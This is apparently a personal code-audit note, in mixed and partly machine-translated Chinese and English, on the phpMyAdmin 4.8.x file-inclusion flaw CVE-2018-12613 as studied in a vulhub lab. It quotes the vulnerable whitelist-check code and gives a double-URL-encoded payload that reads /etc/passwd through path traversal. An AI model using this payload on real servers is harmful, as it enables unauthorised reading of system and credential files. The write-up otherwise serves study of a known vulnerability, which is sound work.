前言

I looked at the last blog post20天前的事了,Going to work recently,Learning a lot less,Played it two days agovulhub靶场的phpmyadmin文件包含漏洞（CVE-2018-12613）But some don't understand,By taking time out of Baidu and understanding,写一下笔记,Don't forget about it

漏洞描述

攻击者利用发现在服务器上包含（查看和潜在执行）文件的漏洞.该漏洞来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,

以及对白名单页面进行不正确的测试. 攻击者必须经过身份验证,但在这些情况下除外：

$ cfg [‘AllowArbitraryServer’] =
true：攻击者可以指定他/她已经控制的任何主机,并在phpMyAdmin上执行任意代码; $ cfg [‘ServerDefault’]
= 0：这会绕过登录并在没有任何身份验证的情况下运行易受攻击的代码.

漏洞影响范围​

phpMyAdmin 4.8.0和4.8.1

漏洞分析

查看index.php的50行到63行内容

target_blacklist = array (
    'import.php', 'export.php'
);  #定义了一个黑名单

// If we have a valid target, let's load that script instead if (! empty($_REQUEST['target']) #要求target不为空 && is_string($_REQUEST['target']) #要求target为字符串 && ! preg_match('/^index/', $_REQUEST['target']) #要求target不已index开头 && ! in_array($_REQUEST['target'], $target_blacklist) #要求targetNot in the blacklist && Core::checkPageValidity($_REQUEST['target']) #checkPageValidity要为真 ) { include $_REQUEST['target'];				#The above five conditions are met to include the file
    exit;
}

The first four conditions are easily met,It is the fifth condition that is a little more troublesome

查看Coer.php的443行到476行

public static function checkPageValidity(&$page, array $whitelist = [])
    {
    
        if (empty($whitelist)) {
    
            $whitelist = self::$goto_whitelist;  #Initialize the whitelist
        }
        if (! isset($page) || !is_string($page)) {
    
            return false;       #Return if the input and output parameters are empty or not stringsfalse
        }

        if (in_array($page, $whitelist)) {
    
            return true;   #Determines that the incoming parameters are in the whitelist,则返回true
        }
		#如果这里返回false就执行以下代码
        $_page = mb_substr(
            $page,
            0,
            mb_strpos($page . '?', '?')   #Intercept incoming parameters to start？中间的字符串
        );
        if (in_array($_page, $whitelist)) {
    
            return true;  #If it is judged again that it exists in the whitelist, it will returntrue
        }
		#If here is also returnedfalse就执行以下代码
        $_page = urldecode($page); #The main trigger of this vulnerability is here,这里进行了一次url解码
        $_page = mb_substr(
            $_page,
            0,
            mb_strpos($_page . '?', '?')  #Intercept incoming parameters to start？中间的字符串
        );
        if (in_array($_page, $whitelist)) {
    
            return true;   #Determines that the incoming parameters are in the whitelist,则返回true
        }
		#如果这里返回false就直接返回false
        return false;
    }

白名单在core.php的31行到79行

public static $goto_whitelist = array(
        'db_datadict.php',
        'db_sql.php',
        'db_events.php',
        'db_export.php',
        'db_importdocsql.php',
        'db_multi_table_query.php',
        'db_structure.php',
        'db_import.php',
        'db_operations.php',
        'db_search.php',
        'db_routines.php',
        'export.php',
        'import.php',
        'index.php',
        'pdf_pages.php',
        'pdf_schema.php',
        'server_binlog.php',
        'server_collations.php',
        'server_databases.php',
        'server_engines.php',
        'server_export.php',
        'server_import.php',
        'server_privileges.php',
        'server_sql.php',
        'server_status.php',
        'server_status_advisor.php',
        'server_status_monitor.php',
        'server_status_queries.php',
        'server_status_variables.php',
        'server_variables.php',
        'sql.php',
        'tbl_addfield.php',
        'tbl_change.php',
        'tbl_create.php',
        'tbl_import.php',
        'tbl_indexes.php',
        'tbl_sql.php',
        'tbl_export.php',
        'tbl_operations.php',
        'tbl_structure.php',
        'tbl_relation.php',
        'tbl_replace.php',
        'tbl_row_action.php',
        'tbl_select.php',
        'tbl_zoom_select.php',
        'transformation_overview.php',
        'transformation_wrapper.php',
        'user_password.php',

playload：index.php?target=sql.php%253f/…/…/…/…/…/…/…/…/etc/passwd

解释：target=sql.php%253f 在服务器收到urldecode once,变成?target=sql.php%3f ;再通过urldecode时,在进行一次url解码,变成?target=sql.php?,符合?The previous one was in the whitelist.所以就绕过了checkPageValidity()方法.

总结

Although it is said that a filtering judgment is carried out here,But he hasn't changed the value we passed in first,Therefore, the vulnerability of arbitrary file inclusion occurs.
The above is my understanding of this vulnerability,如有不对之处,也请大家指出
Talk about your problem,Although it was written down,But in the code audit process,There are still many functions that are not understood,Next time to learnphp和javafor future code audits,This is also my first code audit article,If you don't write clearly and incorrectly, please let us know！